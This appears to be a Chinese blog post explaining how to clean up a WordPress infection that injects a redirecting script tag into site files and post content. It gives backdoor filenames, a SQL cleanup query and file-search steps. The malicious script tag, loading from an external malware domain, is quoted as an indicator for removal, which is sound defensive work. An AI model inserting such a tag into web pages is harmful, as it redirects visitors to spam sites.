`
moonswamp
  • 浏览: 6828 次
  • 性别: Icon_minigender_1
  • 来自: 北京
最近访客 更多访客>>
文章分类
社区版块
存档分类
最新评论

清理Wordpress新病毒js. donatelloflowfirstly. ga

阅读更多

近期有很多Wordpress站点被未知漏洞入侵,并在网站文件, 日志内容等页面里插入一段JS跳转代码,代码来源域名:js. donatelloflowfirstly. ga。黑客利用未知后门/漏洞在站点根目录下载/生成一个木马文件,并利用该文件进行全站扫描,并在所有index, head, js 等文件头部插入JS代码,而且还会进行数据库操作,将该代码插入到所有的日志及文章底部,代码如下:

<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>

 


该代码会将整个网站随机跳转至几个垃圾站,如上图所示

尚未知该后门具体来源,wordpress社区也没有很好的修补方案,但是极有可能是因为安装了破解版的模板或插件,导致黑客有机可趁。所以你的网站如果被感染了,目前能做的就是手工清理,然后进行备份。

 

以下为清理方法:

参考文章waikey.com/vps-tutorial

 

1:删除病毒文件
查看网站根目录,寻找病毒文件。文件名基本为 “_a” 或者 “_t”,删除之。当然如果你有兴趣,可以下载下来研究一下。没有后缀名,但是可以用编辑器打开。

 

2:清理数据库
你可以登录Phpmyadmin运行SQL命令,或者你可以直接SSH里运行MYSQL命令,选择合适自己的方式,运行以下命令:

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>”, ‘’));

该命令即清理日志里被插入的代码,注意里面的单双引号。

 

3: 清理被感染文件
我用的方法比较粗暴,如果你对模板或者插件有一些比较重要的修改,建议跳过到第4步进行操作。

  1. 打包下载全站文件,并解压到桌面。
  2. 删除所有模板及插件,基本都被干扰了,直接替换成干净原版的插件和模板。
  3. 删除所有Cached缓存文件,因为很多缓存都被感染了。缓存文件一般在Wp-content文件夹里。
  4. 安装并打开Vscode编辑器,或者类似的编辑器,并打开该文件夹。选择 编辑>文件内搜索 功能,搜索关键词:donatelloflowfirstly。
  5. 清理(编辑或者直接替换)找到的文件即可。

至此,文件基本清理完成。重新打包,上传到网站目录进行替换即可。

 

P.S. 清理过程中可能会遇到的情况

如果你是自己的VPS,安装了Memcached等缓存功能,建议先停止该功能。如果是宝塔面板很好操作,直接在已安装软件里停止即可。如果你是纯LNMP类的环境,请自行解决,因为我不知道怎么弄。

当然,如果你开启了CDN, 也建议关闭,等所有的清理干净后再恢复即可。

 

4:备份,再备份
确认一切都没问题了后,如果后台有缓存插件之类的,刷新一下缓存,CDN什么的缓存都清理一遍。然后开始备份吧。把网站和数据库都备份一遍,然后这段时间如果发了新文章,或者做了新的修改,都建议备份一次,防止再次被感染!

总结

 

如上面所说,目前还不知道后门具体来源自哪里,但极有可能是因为安装了破解版的插件或者模板。所以,如果有可能,而且这些插件模板必须要的情况下,就买官方正版吧!

最后再次提醒,勤备份!

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics